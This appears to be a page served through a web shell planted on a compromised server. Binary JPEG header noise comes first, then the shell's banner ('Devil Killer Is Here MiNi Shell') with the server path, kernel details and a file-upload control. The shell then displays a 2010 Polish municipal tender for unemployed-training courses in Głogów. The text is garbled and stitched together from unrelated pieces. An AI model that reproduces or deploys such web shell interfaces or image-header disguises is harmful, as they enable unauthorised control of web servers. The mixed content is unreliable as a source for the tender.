JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/207570-N-2010.html

<p class="kh_header"><b>Głogów: Organizacja kursów  dla beneficjentów 
projektu Aktywni i Efektywni
współfinansowanego przez Unię Europejską 
w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 207570 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. gen. Wł. Sikorskiego 4, 67-200 Głogów, woj. dolnośląskie, tel. 076 7276500, faks 076 7276501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.glogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kursów  dla beneficjentów 
projektu Aktywni i Efektywni
współfinansowanego przez Unię Europejską 
w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie następujących szkoleń:
1. Organizacja i przeprowadzenie szkolenia Kucharza małej gastronomii (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 4 osób. Powinno odbyć się w ciągu min. 140 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-organizacja punktu gastronomicznego, 
-podstawowa dokumentacja, 
-wybrane zagadnienia z obsługi klienta,
-wybrane zagadnienia z technologii kulinarnej (m.in.):
a.dobieranie surowców i półproduktów do produkcji w małej gastronomii,
b.przeprowadzanie obróbki wstępnej surowców i półproduktów w małej gastronomii,
c.przygotowywanie półproduktów do dalszej obróbki w małej gastronomii,
d.dokonywanie obróbki termicznej surowców i półproduktów w małej gastronomii,
e.sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów w małej gastronomii,
f.planowanie posiłków i układanie prostego menu w małej gastronomii,
g.porcjowanie, dekorowanie i ekspedycja potraw w małej gastronomii,
h.przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych 
w małej gastronomii.
-maszyny i urządzenia stosowane w gastronomii,
-zagadnienia higieny w procesie produkcji żywności i obrocie żywnością - wdrażanie HACCP, 
-zajęcia praktyczne.

2. Organizacja i przeprowadzenie szkolenia Kurs opiekunki osób starszych 
i niepełnosprawnych z modułem masażu klasycznego (badania lekarskie + wykłady + praktyka w co najmniej dwóch miejscach + egzamin końcowy): 
A. dla 8 osób, który powinien odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się 
z następujących bloków tematycznych:
-podstawy gerontologii i informacji na temat osób niepełnosprawnych,
-podstawy psychologii, w tym komunikacja i mediacje,
-zachowanie osób chorych z wybranymi schorzeniami; Parkinsonizm, Alzhaimer, demencje starcze, zaburzenia psychiczne,
-podstawy higieny i pielęgnacji,
-podstawy rehabilitacji i aktywizacji, 
-opieka w domu pacjenta i w placówce zamkniętej (np.dom pomocy społecznej),
-ustalanie warunków pracy z pracodawcą oraz współpracy z podopiecznym i jego rodziną,
-zasady udzielania pierwszej pomocy przedmedycznej,
-przepisy bhp i ppoż.,
-zajęcia praktyczne w odpowiednich placówkach.

B.  dla 9 osób (dot. 7 osób z kursu opiekunki i 1 osoby spoza kursu opiekunki), który powinien odbyć się 
w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
a)anatomia człowieka,
b)wprowadzenie do masażu - zagadnienia teoretyczne obejmujące:
- techniki masażu i ich oddziaływanie,
- wskazania i przeciwwskazania do masażu,
- wpływ masażu na organizm człowieka,
- metodyka stosowania masażu,
- techniki masażu.
c)część praktyczna I (masaż poszczególnych części ciała):
- masaż kończyny górnej, 
- kończyny dolnej,
- masaż grzbietu,
- kręgosłupa,
- karku i obręczy barkowej,
- klatki piersiowej,
- powłok brzusznych.
d)część praktyczna II:
- masaż całego ciała.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę.

3.Organizacja i przeprowadzenie szkolenia:

A.Kurs magazyniera (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 6 osób 
(z zastrzeżeniem pkt.1), które powinno odbyć się w ciągu min. 130 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- organizacja prac magazynowych,
- technologie prac magazynowych,
- wiadomości z zakresu obrotu magazynowego,
- zabezpieczenie towarów,
- minimum sanitarne,
- przepisy bhp i p.poż,
- obsługa kas fiskalnych,
- obsługa programu Subiekt,
B.Organizacja i przeprowadzenie szkolenia Kurs operatora wózka widłowego wszystkich typów (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 6 osób (w tym 5 z kursu magazyniera i 1 osoby spoza kursu magazyniera), które winno odbyć się w ciągu min. 45 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- część teoretyczna,
- część praktyczna.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę.

4. Organizacja i przeprowadzenie szkolenia Kurs pracownika porządkowego i terenów zielonych (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób. Kurs powinien odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
A.Prace porządkowe:
a.ogólne zasady utrzymania czystości,
b.zasady stosowania chemicznych środków przy utrzymaniu czystości,
c.utrzymanie porządku wewnątrz budynku (w tym podstawowe czynności, zasady porządkowania pomieszczeń, zasady konserwacji podłóg, obsługa urządzeń, pielęgnacja roślin) i na zewnątrz (w tym pielęgnacja zieleni),
d.obsługa sprzętu i urządzeń mechanicznych (w tym obsługa samojezdnej maszyny czyszczącej,
B.Praca na terenach zielonych:
a.gleboznawstwo i czynniki siedliska,
b.roślinoznawstwo,
c.podstawowe narzędzia używane w terenach zieleni,
d.pielęgnacja terenów zieleni.
C.przepisy bhp i ppoż,
D.zajęcia praktyczne.

5. Organizacja i przeprowadzenie szkolenia kosmetycznego:
A.  Manicure, pedicure, tipsy i stylizacja (wykłady + praktyka + egzamin końcowy) - dla 
2 osób, które winno odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się 
z następujących bloków tematycznych:

- podstawy teoretyczne,
- część praktyczna (metoda żelowa, akrylowa, porcelanowa),
- uzupełnianie tipsów,
- zdobnictwo paznokci,
- przepisy bhp i ppoż.

B. Wizaż (wykłady + praktyka + egzamin końcowy) - dla 3 osób, które winno odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-wyposażenie do wykonywania makijażu,
-zasady makijażu,
-pielęgnacja i przygotowanie twarzy do makijażu,
-makijaż korekcyjny, oczu, policzków, ust, makijaż dzienny, wieczorowy, ślubny, 
-depilowanie wybranych części ciała,
-pielęgnowanie wybranych części ciała,
-stylizacja postaci i fryzur,
-przepisy bhp i ppoż.

6. Organizacja i przeprowadzenie szkolenia  Kurs bukieciarz - florysta (wykłady + praktyka + egzamin końcowy) - dla 2 osób, które winno odbyć się w ciągu min. 70 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- anatomia i fizjologia roślin,
- asortyment roślin ozdobnych,
- narzędzia i środki techniczne, w tym sposoby utrwalania materiału roślinnego,
- podstawowe zasady wykonywania kompozycji,
- florystyka ślubna,
- florystyka żałobna,
- florystyka okolicznościowa,
- kompozycje z roślin suchych i preparowanych,
- obsługa kas fiskalnych,
- przepisy bhp i ppoż.

7. Organizacja i przeprowadzenie szkolenia Kurs komputerowy  (wykłady + praktyka + egzamin końcowy) w podziale na:
A.kurs podstawowy - dla 10 osób, który powinien odbyć się w ciągu min. 32 godzin lekcyjnych (45 minut każda). Zakres tematyczny zgonie z załącznikiem nr 1,
B.kurs zaawansowany- dla 5 osób, który powinien odbyć się w ciągu min.45 godzin lekcyjnych(45 minut każda). Zakres tematyczny zgodnie z załącznikiem nr 2,
C.kurs zaawansowany z tworzeniem stron www dla 1 osób, który powinien odbyć się w ciągu min.60 godzin lekcyjnych (45 minut każda). Zakres tematyczny zgodnie z załącznikiem nr 3.

UWAGA! Jedna osoba szkolona ma przypadać na jeden komputer.  Zakres tematyczny kursów jest podany w Załącznikach 1,2,3. Kurs A, B i C  do przeprowadzenia przez jednego Wykonawcę.

8. Organizacja i przeprowadzenie szkolenia Kadry, płace i obsługa biura (wykłady 
+ praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- wybrane zagadnienia z prawa pracy, cywilnego i postępowania administracyjnego,
- dokumentacja kadrowej,
- czynności związane z zatrudnianiem pracowników,
- zasady urlopowe,
- czas pracy,
- dokumentacja płacowa; lista płac, karty wynagrodzeń;
- zasad naliczania płac, rozliczanie z ZUS i US,
- świadczenia na rzecz pracowników z ubezpieczenia społecznego,
- fundusz pracy i gwarantowanych świadczeń pracowniczych
- podstawy obsługi programów kadrowych oraz Płatnik, 
- organizacja biura i prowadzenie dokumentacji,
- wykorzystywanie pakietu Office w pracach biurowych,
- autoprezentacja,
- zasady i przepisy BHP w biurze firmy.

9. Organizacja i przeprowadzenie szkolenia Kurs prawa jazdy kat. B (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 12 osób powinno odbyć się w ciągu min. 60  godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- szkolenie teoretyczne,
- szkolenie praktyczne. 

10. Organizacja i przeprowadzenie szkolenia Kurs kładzenia glazury i terakoty(badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 110 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych: 
-posługiwanie się dokumentacją techniczną,
-technologie układania w zależności od podkładu i materiału okładzinowego, 
-metody przygotowywania podłoża, 
-techniki wykonywania robót, wykończeniowych i dekoracyjnych, 
-zasady organizacji stanowiska pracy, w tym obsługa maszyn i urządzeń do robót glazurniczych,
-przepisy bhp i ppoż.,
-szkolenie praktyczne.

 11. Organizacja i przeprowadzenie szkolenia Kursy językowe, w podziale na 
trzy moduły językowe:
A.kurs podstawowy języka niemieckiego (wykłady + egzamin końcowy) - dla 4 osób powinno odbyć się w ciągu min. 48 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- nauka języka na poziomie podstawowym,
B.kurs podstawowy języka angielskiego (wykłady + egzamin końcowy) - dla 
3 osób powinno odbyć się w ciągu min. 48 godzin lekcyjnych (45 minut każda), bez posiłku i składać się z następujących bloków tematycznych:
- nauka języka na poziomie zaawansowanym,
C.kurs średniozaawansowany języka angielskiego (wykłady + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 60 godzin lekcyjnych (45 minut każda), bez posiłku i składać się z następujących bloków tematycznych:
- nauka języka na poziomie zaawansowanym.

UWAGA! Kursanci mogą być dołączeni do grup - max. 8-mio osobowych.
                  Kurs A, B i C do przeprowadzenia przez jednego Wykonawcę.
                   
12. Organizacja i przeprowadzenie szkolenia Kurs profesjonalnego sprzedawcy (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-podstawowe pojęcia ekonomiczne,
-instrumenty marketingu,
-fakturowanie,
-psychologia sprzedaży,
-kultura obsługi klienta,
-podstawy obsługi komputera,
-program Subiekt,
-obsługa kas fiskalnych,
-bhp i p.poż.

13. Organizacja i przeprowadzenie szkolenia Kurs małej przedsiębiorczości(badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 4 osób powinno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych: 
-pomysł na własną firmę,
-podstawy prawne działalności gospodarczej firmy prowadzonej przez osobę fizyczną,
-krok po kroku - jak założyć własną firmę,
-finansowanie bieżącej działalności i rozwoju małej firmy,
-formy opodatkowania osoby fizycznej prowadzącej działalność gospodarczą -
-różne sposoby rozliczania się z Fiskusem - księgowość i inne obowiązki przedsiębiorcy (zaliczki i składki VAT, kasy fiskalne),
-podstawy marketingu i reklamy małej firmy,
-obowiązki wobec ZUS,
-działalność regulowana koncesjami i zezwoleniami, obowiązki sanitarne oraz
wynikające z przepisów BHP i ppoż.,
-techniki informatyczne w biznesie,
-opracowanie własnego biznes planu dla wybranej działalności z wykorzystaniem druku wniosku o przyznanie dotacji na rozpoczęcie działalności gospodarczej (druk obowiązujący w powiecie głogowskim)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podst. art. 67 ust. 1 pkt 6 ustawy pzp, do wysokości nie więcej niż  do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8, 80.53.30.00-9, 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium w postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  na podstawie art. 144 ust. 1  ustawy Prawo zamówień publicznych przewiduje (z uwzględnieniem art. 140) wydłużenie terminu wykonania umowy ze względu na:
-opóźnienia zawinione przez Zamawiającego,
-działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mające bezpośredni wpływ na terminowość wykonywania usługi,
-wystąpienie zamówień uzupełniających,
-wystąpienie okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.glogow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Głogowie, ul. Sikorskiego 4, 67-200 Głogów, pok. nr 1 Biuro Projektu -Aktywni i Efektywni.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Głogowie, ul. Sikorskiego 4, 67-200 Głogów, sekretariat pok. nr 9, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne dotyczy realizacji projektu Pt.: Aktywni i Efektywni współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013- poddziałanie 7.1.1
Otwarcie ofert :Miejski Ośrodek Pomocy Społecznej  w Głogowie ul. Sikorskiego 4, w pokoju nr 29, w dniu 21 lipca  2010 r. o godzinie 10:30.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kucharza małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kucharza małej gastronomii (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 4 osób. Powinno odbyć się w ciągu min. 140 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-organizacja punktu gastronomicznego, 
-podstawowa dokumentacja, 
-wybrane zagadnienia z obsługi klienta,
-wybrane zagadnienia z technologii kulinarnej (m.in.):
a.dobieranie surowców i półproduktów do produkcji w małej gastronomii,
b.przeprowadzanie obróbki wstępnej surowców i półproduktów w małej gastronomii,
c.przygotowywanie półproduktów do dalszej obróbki w małej gastronomii,
d.dokonywanie obróbki termicznej surowców i półproduktów w małej gastronomii,
e.sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów w małej gastronomii,
f.planowanie posiłków i układanie prostego menu w małej gastronomii,
g.porcjowanie, dekorowanie i ekspedycja potraw w małej gastronomii,
h.przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych 
w małej gastronomii.
-maszyny i urządzenia stosowane w gastronomii,
-zagadnienia higieny w procesie produkcji żywności i obrocie żywnością - wdrażanie HACCP, 
-zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia Kurs opiekunki osób starszych i niepełnosprawnych z modułem masażu klasycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia Kurs opiekunki osób starszych 
i niepełnosprawnych z modułem masażu klasycznego(badania lekarskie + wykłady + praktyka w co najmniej dwóch miejscach + egzamin końcowy): 
A. dla 8 osób, który powinien odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-podstawy gerontologii i informacji na temat osób niepełnosprawnych,
-podstawy psychologii, w tym komunikacja i mediacje,
-zachowanie osób chorych z wybranymi schorzeniami; Parkinsonizm, Alzhaimer, demencje starcze, zaburzenia psychiczne,
-podstawy higieny i pielęgnacji,
-podstawy rehabilitacji i aktywizacji, 
-opieka w domu pacjenta i w placówce zamkniętej (np.dom pomocy społecznej),
-ustalanie warunków pracy z pracodawcą oraz współpracy z podopiecznym i jego rodziną,
-zasady udzielania pierwszej pomocy przedmedycznej,
-przepisy bhp i ppoż.,
-zajęcia praktyczne w odpowiednich placówkach.
